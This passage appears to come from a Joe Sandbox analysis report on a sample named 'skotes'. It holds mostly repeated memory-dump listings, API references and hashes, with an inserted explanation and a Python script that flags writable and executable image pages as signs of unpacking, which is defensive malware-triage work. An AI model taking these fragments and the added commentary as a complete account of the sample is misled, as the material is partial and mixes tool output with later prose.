• Instruction Fuzzy Hash: 6101FD32600524A7CF1AFA648841FFFB7ABDB84310F00801DFC16AB382DA70EE1193A0
APIs
• Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 006B9519
  • Part of subcall function 006AF4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 006B5486
• Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 006B953D
• Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 006B9550
• Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 006B9559
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 218105897-0
                                                                                                                                                                                                                                          • Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                                                                                          • Instruction ID: 9291e4c0b5223cd497c7f54e31613961fafa865e7ec75c7888f5bca45862ac95
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22F037B1640B105EE6B2AB548811FEA23DBDF44715F00C41DE65B97242CE24FDC2CFA5
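The `.sdmp` identifiers in the Associated lists above carry, among other fields, the dumped region's base address, its page protection and its memory type. For the image mapped at 0x690000 ("based on PE: true") the listed protections alternate between 0x40 (PAGE_EXECUTE_READWRITE) and 0x80 (PAGE_EXECUTE_WRITECOPY), which is the page-level evidence behind the report's "Detected unpacking (changes PE section rights)" signature: a loader never maps an image page as PAGE_EXECUTE_READWRITE, so that value means the page was either re-protected or written to after mapping. The following Python is an added example, not part of the Joe Sandbox report or its tooling. It parses such names and flags writable+executable image pages. Only the address, protection and type fields are decoded, against the winnt.h constants; the meaning of the remaining five fields (taken here to be process, dump and unique identifiers plus two flag words) is an assumption and they are not interpreted. The sample names are copied from the listing above.

```python
import re
from dataclasses import dataclass

# Win32 page-protection constants (winnt.h).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}
MEM_IMAGE = 0x01000000  # winnt.h: region is backed by a mapped PE image

# A Joe Sandbox .sdmp name is eight dot-separated fields. Fields 4 (base
# address), 5 (page protection) and 7 (memory type) decode unambiguously
# against winnt.h. The other fields are ASSUMED to be process id, dump id,
# unique id and two flag words; they are captured but never interpreted.
SDMP_RE = re.compile(
    r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\."
    r"([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Region:
    name: str
    base: int
    protect: int
    mem_type: int

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protect, f"0x{self.protect:02X}")

    @property
    def executable(self) -> bool:
        return self.protect in EXECUTABLE

    @property
    def writable(self) -> bool:
        return self.protect in WRITABLE

    @property
    def is_image(self) -> bool:
        return self.mem_type == MEM_IMAGE


def parse_sdmp(name: str) -> Region:
    """Parse one .sdmp file name; raises ValueError on anything else."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name!r}")
    return Region(
        name=m.group(0),
        base=int(m.group(4), 16),
        protect=int(m.group(5), 16),
        mem_type=int(m.group(7), 16),
    )


def writable_executable_image_pages(names):
    """Return the MEM_IMAGE regions whose pages are both writable and
    executable, in input order. A clean loader maps code as
    PAGE_EXECUTE_READ and data as PAGE_READWRITE/PAGE_WRITECOPY, so W+X
    image pages are what a packer leaves behind after rewriting rights."""
    regions = [parse_sdmp(n) for n in names]
    return [r for r in regions if r.is_image and r.executable and r.writable]


# Constructed sample: four names copied from the report's Associated list.
SAMPLE = [
    "00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp",
]

if __name__ == "__main__":
    for r in writable_executable_image_pages(SAMPLE):
        print(f"{r.base:#010x}  {r.protection_name}")
```

When triaging a report like this one, the distinction between the two flagged values matters: PAGE_EXECUTE_WRITECOPY (0x80) is what the loader assigns to a section whose header already asks for write+execute, whereas PAGE_EXECUTE_READWRITE (0x40) on an image page only arises after a VirtualProtect or after a write turned the copy-on-write page private. The PE header page at 0x690000 being PAGE_READWRITE rather than PAGE_READONLY is likewise not a loader default.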
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006CF232
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 006CF298
                                                                                                                                                                                                                                            • Part of subcall function 006CB04B: RtlAllocateHeap.NTDLL(00000000,440B685B,?,?,006AD3FC,440B685B,?,006A7A8B,?,?,?,?,?,?,00697465,?), ref: 006CB07D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: AllocateHeap__alloca_probe_16__freea
• String ID: Zl,ml
• API String ID: 809856575-2199340090
APIs
• Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 006C1764
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 006C17AF
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
• String ID: pContext
• API String ID: 3390424672-2046700901
APIs
• Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 006B0CD7
• Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 006B0D2A
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
• String ID: p[o
• API String ID: 3303180142-804407572
• Opcode ID: 74c9476c7d8d3d8b2be8b1655bf818d443bacdbdfa18ff7b89310af0e1721ed6
• Instruction ID: fc3751bbb5f236971647f85da77bfe612ddc0ab7c90c1ee66a26c302e1946ea2
• Opcode Fuzzy Hash: 74c9476c7d8d3d8b2be8b1655bf818d443bacdbdfa18ff7b89310af0e1721ed6
• Instruction Fuzzy Hash: D20179B0A056159AEB90BBF865613EE6EE36F09304F60405EF506E7382CF308E818755
APIs
• CreateSemaphoreExW.KERNEL32(?,006B65E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 006ACAFC
• CreateSemaphoreW.KERNEL32(?,006B65E3,00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,00000000), ref: 006ACB1E
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateSemaphore
                                                                                                                                                                                                                                          • String ID: ek
                                                                                                                                                                                                                                          • API String ID: 1078844751-651932590
                                                                                                                                                                                                                                          • Opcode ID: c08d214e822829490f0338f08189bbbaa6444515e168798e70f629a72475ebd1
                                                                                                                                                                                                                                          • Instruction ID: e3e6c7b7355f9f71d74984e3f01637cb1388d340e86612044ff8b34a6f3f53df
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c08d214e822829490f0338f08189bbbaa6444515e168798e70f629a72475ebd1
